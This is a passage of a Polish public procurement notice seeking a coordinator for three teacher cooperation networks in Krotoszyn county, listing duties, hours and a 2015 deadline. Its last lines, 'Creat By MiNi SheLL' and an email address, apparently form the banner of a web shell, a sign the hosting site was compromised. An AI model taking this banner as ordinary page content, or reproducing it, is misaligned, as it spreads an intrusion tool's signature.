powstaną 3 sieci dla nauczycieli szkól i przedszkoli..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Koordynator sieci współpracy i samokształcenia dla nauczycieli w ramach projektu Wdrożenie modelu doskonalenia nauczycieli i kompleksowego wsparcia rozwoju szkół i przedszkoli w powiecie krotoszyńskim,
powstaną 3 sieci dla nauczycieli szkól i przedszkoli.
1.Szacunkowa ilość godzin dla koordynatora sieci współpracy i samokształcenia: 30 godzin miesięcznie.

2.W ramach sieci współpracować ze sobą będzie około 20-25 nauczycieli z różnych szkół i przedszkoli,                 tj, w sumie ok. 150 nauczycieli. Członkowie sieci będą spotykać się nie mniej niż 4 razy w trakcie pracy jednej sieci. Między spotkaniami nauczyciele będą pracować na platformie internetowej udostępnionej przez ORE.
3.Obowiązki koordynatora sieci współpracy i samokształcenia:
1.	przygotowanie planu dziania sieci współpracy i samokształcenia zgodnego z potrzebami zgłoszonymi przez uczestników,
2.	organizacja spotkań (przygotowanie i prowadzenie, zapraszanie metodyków, ekspertów z określonych dziedzin),
3.	moderowanie forum dyskusyjnego na platformie cyfrowej,
4.	zamieszczanie na platformie cyfrowej materiałów samokształceniowych i innych zasobów edukacyjnych łączących się z tematyką sieci,
5.	sporządzenie rocznego sprawozdania z pracy sieci i przedstawienie go uczestnikom,
6.	promocja działań sieci,
7.	monitorowanie frekwencji na zajęciach,
8.	współpraca ze specjalistami/ekspertami prowadzącymi zajęcia;
9.	prowadzenie nadzoru nad prawidłowym przebiegiem zajęć
10.	prowadzenie list obecności uczestników projektu.

4.Osoba pełniąca obowiązki koordynatora sieci współpracy i samokształcenia musi posiadać pełną zdolność do czynności prawnych oraz korzystania z pełni praw publicznych oraz być dyspozycyjna w okresie realizacji projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com